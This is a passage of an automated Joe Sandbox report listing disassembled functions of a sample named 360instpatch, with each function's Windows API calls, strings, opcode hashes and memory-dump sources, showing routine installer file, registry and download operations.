                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeString$BlanketClearCreateH_prolog3InstanceProxyVariant
                                                                                                                                                                                                              • String ID: MediaType$Root\Microsoft\Windows\Storage$SELECT * FROM MSFT_PhysicalDisk WHERE DeviceId='%d'$WQL
                                                                                                                                                                                                              • API String ID: 2951287799-4271271752
                                                                                                                                                                                                              • Opcode ID: ec7227d4155acfc48441219a1e6fbfff7a6568637e474ae12d0eaa367ed792ae
                                                                                                                                                                                                              • Instruction ID: 7d40f1a42687e2fcf899e9d4ff6c17d458b9a2bef1ad87561b38dd616e4afd8a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec7227d4155acfc48441219a1e6fbfff7a6568637e474ae12d0eaa367ed792ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3714B71900249EFDF01DFE4C895AADBBF8EF48304F2444A9F615AB2A1C7759E45CB21
                                                                                                                                                                                                              Function 00B7E7DF Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 116fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B7E7FE
                                                                                                                                                                                                                • Part of subcall function 00B3ECB6: __EH_prolog3.LIBCMT ref: 00B3ECBD
                                                                                                                                                                                                                • Part of subcall function 00B7E697: __EH_prolog3.LIBCMT ref: 00B7E69E
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7E887
                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00120116,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00B7E8D9
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00B7E8EA
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00B7E901
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00B7E925
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,0000002C), ref: 00B7E92E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileH_prolog3$CloseCreateDeleteHandleWrite_memset_wcslen
                                                                                                                                                                                                              • String ID: %s\%s.tf
                                                                                                                                                                                                              • API String ID: 3257772056-3749842194
                                                                                                                                                                                                              • Opcode ID: bdf32af999b7a9eece5edec689ed83ed2f5ae965c4ecd18db233aa7d0e4d6a25
                                                                                                                                                                                                              • Instruction ID: 388478cf0f0b8482554d94e72564169a094ffdbcb090902ded35bea76dab257a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bdf32af999b7a9eece5edec689ed83ed2f5ae965c4ecd18db233aa7d0e4d6a25
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8416371900148ABDF25EFA4DC46EFE7BF8EF48310F0441A9F529A7291DB70AA44CB61
                                                                                                                                                                                                              Function 6BF27367 Relevance: 16.6, APIs: 11, Instructions: 97registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.KERNEL32(?,?,00000000,00000010,?), ref: 6BF27390
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Open
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                                                                              • Opcode ID: 8c3abe1428435b7abac3e4db419699603a013c85a3faf7b20bb94d7bead02ef3
                                                                                                                                                                                                              • Instruction ID: 1b13b6bb1b4bc1f9d12e29abf0c08a8d8a04be3f3c282bcb86bc7583222fde04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8c3abe1428435b7abac3e4db419699603a013c85a3faf7b20bb94d7bead02ef3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B316A73210302EFEB205FA6CC88E57BBE9FF56711B108869F95A81170C7759CA8DB20
                                                                                                                                                                                                              Function 00B7A2D7 Relevance: 16.6, APIs: 11, Instructions: 85memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindResourceW.KERNEL32(?,?,?,?,?,?,00B7A3CA,?,00000000,?), ref: 00B7A2E7
                                                                                                                                                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,?,?,00B7A3CA,?,00000000,?), ref: 00B7A301
                                                                                                                                                                                                              • LoadResource.KERNEL32(?,00000000,?,?,?,?,00B7A3CA,?,00000000,?), ref: 00B7A311
                                                                                                                                                                                                              • LockResource.KERNEL32(00000000,?,?,?,?,00B7A3CA,?,00000000,?), ref: 00B7A318
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,00B7A3CA,?,00000000,?), ref: 00B7A327
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00B7A349
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Resource$Global$AllocFindFreeLoadLockSizeof
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3537612842-0
                                                                                                                                                                                                              • Opcode ID: 02e84ad4c7140579fa6696b4d66a3caf6b542acc63162b6e09ac137004b679ce
                                                                                                                                                                                                              • Instruction ID: 1e8d9b86dab45035faf7522d2dd32ce1c3d15dfd28b31a603a00394f11057fc5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02e84ad4c7140579fa6696b4d66a3caf6b542acc63162b6e09ac137004b679ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD217131100214EFDB122F609C8CCAF3BADFFC97503158864F829D7120EB35DD509A66
                                                                                                                                                                                                              Function 00B80691 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 140fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B806B0
                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,00000010), ref: 00B806CC
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B8070A
                                                                                                                                                                                                                • Part of subcall function 00B56DCF: _vswprintf_s.LIBCMT ref: 00B56E02
                                                                                                                                                                                                                • Part of subcall function 00B6D71E: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00B6D74A
                                                                                                                                                                                                                • Part of subcall function 00B6D71E: GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00B6D767
                                                                                                                                                                                                                • Part of subcall function 00B6D71E: SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00B6D77A
                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,?), ref: 00B8083D
                                                                                                                                                                                                                • Part of subcall function 00B6EE1E: __EH_prolog3.LIBCMT ref: 00B6EE25
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B807B9
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B807FA
                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000010,?,?), ref: 00B80821
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File_memset$H_prolog3Path$DeleteDirectoryErrorExistsFindFirstFullLastNameRemove_vswprintf_s
                                                                                                                                                                                                              • String ID: %s\%s$%s\*.*
                                                                                                                                                                                                              • API String ID: 1543874411-1665845743
                                                                                                                                                                                                              • Opcode ID: 00762d88372a071d710df8b83237fceb886d058d2633606556d967ee8badf2b9
                                                                                                                                                                                                              • Instruction ID: fea5d431c2ad591f080c012e7d56f1649e71f07163c35107f7861e2d5e001155
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 00762d88372a071d710df8b83237fceb886d058d2633606556d967ee8badf2b9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83512E7191028EABDF60EFA4CC45BEF77ECEF18704F404469B91997252EB34A608CB65
                                                                                                                                                                                                              Function 6BEF55CE Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 125COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6BEF55D5
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,6BF0B438,00000000,?,?,6BF0C3E5,?,00000007,?), ref: 6BEF5643
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: _memset.LIBCMT ref: 6BF24091
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: wvnsprintfW.SHLWAPI(?,000003FF,6BFCC288,6BF0E1F9), ref: 6BF240AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] ErrorCode =%d,StartDownload, xrefs: 6BEF56A3
                                                                                                                                                                                                              • [%d.] ErrorCode =%d,, xrefs: 6BEF5650
                                                                                                                                                                                                              • [%d.%3d] AsyncStartDownload from %I64d to %I64d HttpNum = %d , xrefs: 6BEF56F2
                                                                                                                                                                                                              • [%d.] , xrefs: 6BEF55EB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorH_prolog3Last_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: [%d.%3d] AsyncStartDownload from %I64d to %I64d HttpNum = %d $[%d.] $[%d.] ErrorCode =%d,$[%d.] ErrorCode =%d,StartDownload
                                                                                                                                                                                                              • API String ID: 2481933832-1659077646
                                                                                                                                                                                                              • Opcode ID: 103b33ac9558f176dd69dc220d53607528699bf63ea4a26b7bda7e0e4d7c4327
                                                                                                                                                                                                              • Instruction ID: 9e5d0e8ff7c06d23378db5283202a5631649e9764c3a44afb120abcbd8b27a97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 103b33ac9558f176dd69dc220d53607528699bf63ea4a26b7bda7e0e4d7c4327
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A3513E72904701EFDB51CFB8C881B867BE5FF18314F108629E96D8B2A1D736A561CFA1
                                                                                                                                                                                                              Function 6BEE9657 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 97fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] RenameFile file(%s) already exist, xrefs: 6BEE96EE
                                                                                                                                                                                                              • [%d.] MoveFile fail, error code is %d, xrefs: 6BEE971C
                                                                                                                                                                                                              • %s.%u, xrefs: 6BEE96CB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CountDeleteErrorLastMoveTick
                                                                                                                                                                                                              • String ID: %s.%u$[%d.] MoveFile fail, error code is %d$[%d.] RenameFile file(%s) already exist
                                                                                                                                                                                                              • API String ID: 804011810-1231871111
                                                                                                                                                                                                              • Opcode ID: c558f82eea39be37a152d85dd7252eb725c8fa7d1a88f039168af1eb40bde10b
                                                                                                                                                                                                              • Instruction ID: bcb618a7cf4443b55376ba6b429889467c752e7b21f2d288882f23078582d55a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c558f82eea39be37a152d85dd7252eb725c8fa7d1a88f039168af1eb40bde10b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7331D137500201ABDB205FB8CC44FAE77F8FB16708F20456DE552E22A1EB39E4168B71
                                                                                                                                                                                                              Function 00B78657 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 57libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7867B
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7868C
                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B786A1
                                                                                                                                                                                                              • GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B786B2
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,00000000), ref: 00B786C2
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00B786C9
                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B786D7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Version_memset$AddressHandleInfoModuleNativeProcSystem
                                                                                                                                                                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                              • API String ID: 675204089-192647395
                                                                                                                                                                                                              • Opcode ID: 8b6b52824af3135d6cc757cd48bcb625b9f595e065ca7ba7e53358df4c0e21e5
                                                                                                                                                                                                              • Instruction ID: 1b0a93b179b4e4ee69e8c42d7a5696fed0e966eff99ca99b8c1906eef75d4670
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b6b52824af3135d6cc757cd48bcb625b9f595e065ca7ba7e53358df4c0e21e5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67114C71D40258ABDF20ABE49C49FAE7BE8BB08708F0045AAE525E7180EF74D5098A65
                                                                                                                                                                                                              Function 00B7A6F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7A71F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7A72D
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000400,?,?,00000000,000000CE,DLL,00000014,00B2BCDE), ref: 00B7A741
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B7A754
                                                                                                                                                                                                                • Part of subcall function 00B512A8: _memset.LIBCMT ref: 00B512EC
                                                                                                                                                                                                                • Part of subcall function 00B512A8: CoCreateGuid.OLE32(?,?,?,00000800), ref: 00B512F8
                                                                                                                                                                                                                • Part of subcall function 00B512A8: _memset.LIBCMT ref: 00B51309
                                                                                                                                                                                                                • Part of subcall function 00B512A8: _wcsncpy.LIBCMT ref: 00B5135F
                                                                                                                                                                                                              • PathCombineW.SHLWAPI(?,?,?), ref: 00B7A784
                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 00B7A796
                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 00B7A7A4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$Path$CombineCreateExistsFileGuidTemp_wcscat_wcsncpy
                                                                                                                                                                                                              • String ID: .tmp
                                                                                                                                                                                                              • API String ID: 2935203105-2986845003
                                                                                                                                                                                                              • Opcode ID: 6aed1e22f67f5e85cbd8cb51e7949d959214440a3d70b442575c582d19045893
                                                                                                                                                                                                              • Instruction ID: a680c677ca0ead8294c044d02633bd6048f339896361d3f4a55653e9e0980d53
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6aed1e22f67f5e85cbd8cb51e7949d959214440a3d70b442575c582d19045893
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 082145B690021C6BDB14DBA4DD85EDE77FCEB89705F0004F6B319D3141EA74EA458B60
                                                                                                                                                                                                              Function 6BF304D7 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6BF304FB
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000001), ref: 6BF30528
                                                                                                                                                                                                              • RegisterClassExW.USER32(00000030), ref: 6BF3054C
                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000000,?,00000001), ref: 6BF30554
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,360AsyncHelper,360AsyncHelper,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000), ref: 6BF30566
                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 6BF30573
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleModuleWindow$ClassCreateLongRegister_memset
                                                                                                                                                                                                              • String ID: 0$360AsyncHelper
                                                                                                                                                                                                              • API String ID: 845610114-1673954876
                                                                                                                                                                                                              • Opcode ID: 81a0515f83f06bfcbb849c3a450c37ee2ae3bf39c5a356453be83d6585194ddf
                                                                                                                                                                                                              • Instruction ID: 02f4a6ad91fd2cf2f7d5b659668c3b6ded9c64ef65b0ce19666d618de727e566
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81a0515f83f06bfcbb849c3a450c37ee2ae3bf39c5a356453be83d6585194ddf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21110AB2C01218ABDB109F9AD848E9FFEFCEF95750B10455EE415E2260D77455058BA1
                                                                                                                                                                                                              Function 6BF2FF7E Relevance: 13.8, APIs: 9, Instructions: 287networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 6BF2FFAB
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(4004667F,?), ref: 6BF30063
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(4004667F,?), ref: 6BF3009F
                                                                                                                                                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 6BF3028A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastWindow$LongProc
